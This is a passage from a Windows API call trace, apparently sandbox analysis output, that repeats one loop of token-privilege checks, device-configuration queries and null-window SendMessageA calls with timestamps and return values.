OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.888] GetLastError () returned 0x3f0 [0084.888] GetCurrentProcess () returned 0xffffffff [0084.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.888] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.888] SetLastError (dwErrCode=0x522) [0084.888] CloseHandle (hObject=0x114) returned 1 [0084.888] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.889] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.889] GetLastError () returned 0x578 [0084.889] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.889] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.889] GetCurrentThread () returned 0xfffffffe [0084.889] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.889] GetLastError () returned 0x3f0 [0084.889] GetCurrentProcess () returned 0xffffffff [0084.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.889] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.889] SetLastError (dwErrCode=0x522) [0084.889] CloseHandle (hObject=0x114) returned 1 [0084.889] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.889] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.889] GetLastError () returned 0x578 [0084.889] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.889] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.889] GetCurrentThread () returned 0xfffffffe [0084.889] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.889] GetLastError () returned 0x3f0 [0084.889] GetCurrentProcess () returned 0xffffffff [0084.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.889] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.889] SetLastError (dwErrCode=0x522) [0084.889] CloseHandle (hObject=0x114) returned 1 [0084.889] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.889] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.889] GetLastError () returned 0x578 [0084.889] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.889] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.889] GetCurrentThread () returned 0xfffffffe [0084.889] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.889] GetLastError () returned 0x3f0 [0084.889] GetCurrentProcess () returned 0xffffffff [0084.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.890] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.890] SetLastError (dwErrCode=0x522) [0084.890] CloseHandle (hObject=0x114) returned 1 [0084.890] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.890] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.890] GetLastError () returned 0x578 [0084.890] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.890] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.890] GetCurrentThread () returned 0xfffffffe [0084.890] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.890] GetLastError () returned 0x3f0 [0084.890] GetCurrentProcess () returned 0xffffffff [0084.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.890] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.890] SetLastError (dwErrCode=0x522) [0084.890] CloseHandle (hObject=0x114) returned 1 [0084.890] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.890] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.890] GetLastError () returned 0x578 [0084.890] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.890] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.890] GetCurrentThread () returned 0xfffffffe [0084.890] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.890] GetLastError () returned 0x3f0 [0084.890] GetCurrentProcess () returned 0xffffffff [0084.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.890] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.890] SetLastError (dwErrCode=0x522) [0084.890] CloseHandle (hObject=0x114) returned 1 [0084.890] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.890] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.890] GetLastError () returned 0x578 [0084.890] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.890] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.891] GetCurrentThread () returned 0xfffffffe [0084.891] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.891] GetLastError () returned 0x3f0 [0084.891] GetCurrentProcess () returned 0xffffffff [0084.891] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.891] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.891] SetLastError (dwErrCode=0x522) [0084.891] CloseHandle (hObject=0x114) returned 1 [0084.891] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.891] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.891] GetLastError () returned 0x578 [0084.891] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.891] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.891] GetCurrentThread () returned 0xfffffffe [0084.891] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.891] GetLastError () returned 0x3f0 [0084.891] GetCurrentProcess () returned 0xffffffff [0084.891] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.891] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.891] SetLastError (dwErrCode=0x522) [0084.891] CloseHandle (hObject=0x114) returned 1 [0084.891] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.891] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.891] GetLastError () returned 0x578 [0084.891] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.891] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.891] GetCurrentThread () returned 0xfffffffe [0084.891] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.891] GetLastError () returned 0x3f0 [0084.891] GetCurrentProcess () returned 0xffffffff [0084.891] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.891] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.891] SetLastError (dwErrCode=0x522) [0084.892] CloseHandle (hObject=0x114) returned 1 [0084.892] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.892] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.892] GetLastError () returned 0x578 [0084.892] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.892] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.892] GetCurrentThread () returned 0xfffffffe [0084.892] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.892] GetLastError () returned 0x3f0 [0084.892] GetCurrentProcess () returned 0xffffffff [0084.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.892] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.892] SetLastError (dwErrCode=0x522) [0084.892] CloseHandle (hObject=0x114) returned 1 [0084.892] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.892] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.892] GetLastError () returned 0x578 [0084.892] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.892] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.892] GetCurrentThread () returned 0xfffffffe [0084.892] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.892] GetLastError () returned 0x3f0 [0084.892] GetCurrentProcess () returned 0xffffffff [0084.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.892] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.892] SetLastError (dwErrCode=0x522) [0084.892] CloseHandle (hObject=0x114) returned 1 [0084.892] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.892] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.892] GetLastError () returned 0x578 [0084.892] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.892] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.892] GetCurrentThread () returned 0xfffffffe [0084.892] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.892] GetLastError () returned 0x3f0 [0084.893] GetCurrentProcess () returned 0xffffffff [0084.893] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.893] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.893] SetLastError (dwErrCode=0x522) [0084.893] CloseHandle (hObject=0x114) returned 1 [0084.893] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.893] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.893] GetLastError () returned 0x578 [0084.893] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.893] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.893] GetCurrentThread () returned 0xfffffffe [0084.893] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.893] GetLastError () returned 0x3f0 [0084.893] GetCurrentProcess () returned 0xffffffff [0084.893] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.893] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.893] SetLastError (dwErrCode=0x522) [0084.893] CloseHandle (hObject=0x114) returned 1 [0084.893] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.893] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.893] GetLastError () returned 0x578 [0084.893] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.893] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.893] GetCurrentThread () returned 0xfffffffe [0084.893] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.893] GetLastError () returned 0x3f0 [0084.893] GetCurrentProcess () returned 0xffffffff [0084.893] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.893] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.893] SetLastError (dwErrCode=0x522) [0084.893] CloseHandle (hObject=0x114) returned 1 [0084.893] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.893] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.893] GetLastError () returned 0x578 [0084.894] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.894] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.894] GetCurrentThread () returned 0xfffffffe [0084.894] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.894] GetLastError () returned 0x3f0 [0084.894] GetCurrentProcess () returned 0xffffffff [0084.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.894] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.894] SetLastError (dwErrCode=0x522) [0084.894] CloseHandle (hObject=0x114) returned 1 [0084.894] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.894] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.894] GetLastError () returned 0x578 [0084.894] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.894] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.894] GetCurrentThread () returned 0xfffffffe [0084.894] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.894] GetLastError () returned 0x3f0 [0084.894] GetCurrentProcess () returned 0xffffffff [0084.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.894] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.894] SetLastError (dwErrCode=0x522) [0084.894] CloseHandle (hObject=0x114) returned 1 [0084.894] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.894] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.894] GetLastError () returned 0x578 [0084.894] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.894] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.894] GetCurrentThread () returned 0xfffffffe [0084.894] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.894] GetLastError () returned 0x3f0 [0084.894] GetCurrentProcess () returned 0xffffffff [0084.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.894] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.895] SetLastError (dwErrCode=0x522) [0084.895] CloseHandle (hObject=0x114) returned 1 [0084.895] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.895] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.895] GetLastError () returned 0x578 [0084.895] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.895] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.895] GetCurrentThread () returned 0xfffffffe [0084.895] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.895] GetLastError () returned 0x3f0 [0084.895] GetCurrentProcess () returned 0xffffffff [0084.895] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.895] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.895] SetLastError (dwErrCode=0x522) [0084.895] CloseHandle (hObject=0x114) returned 1 [0084.895] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.895] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.895] GetLastError () returned 0x578 [0084.895] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.895] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.895] GetCurrentThread () returned 0xfffffffe [0084.895] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.895] GetLastError () returned 0x3f0 [0084.895] GetCurrentProcess () returned 0xffffffff [0084.895] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.895] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.895] SetLastError (dwErrCode=0x522) [0084.895] CloseHandle (hObject=0x114) returned 1 [0084.895] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.895] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.895] GetLastError () returned 0x578 [0084.895] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.895] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.896] GetCurrentThread () returned 0xfffffffe [0084.896] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.896] GetLastError () returned 0x3f0 [0084.896] GetCurrentProcess () returned 0xffffffff [0084.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.896] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.896] SetLastError (dwErrCode=0x522) [0084.896] CloseHandle (hObject=0x114) returned 1 [0084.896] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.896] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.896] GetLastError () returned 0x578 [0084.896] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.896] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.896] GetCurrentThread () returned 0xfffffffe [0084.896] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.896] GetLastError () returned 0x3f0 [0084.896] GetCurrentProcess () returned 0xffffffff [0084.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.896] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.896] SetLastError (dwErrCode=0x522) [0084.896] CloseHandle (hObject=0x114) returned 1 [0084.896] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.896] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.896] GetLastError () returned 0x578 [0084.896] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.896] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.896] GetCurrentThread () returned 0xfffffffe [0084.896] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.896] GetLastError () returned 0x3f0 [0084.896] GetCurrentProcess () returned 0xffffffff [0084.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.896] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.896] SetLastError (dwErrCode=0x522) [0084.897] CloseHandle (hObject=0x114) returned 1 [0084.897] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.897] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.897] GetLastError () returned 0x578 [0084.897] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.897] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.897] GetCurrentThread () returned 0xfffffffe [0084.897] OpenThreadToken (in: 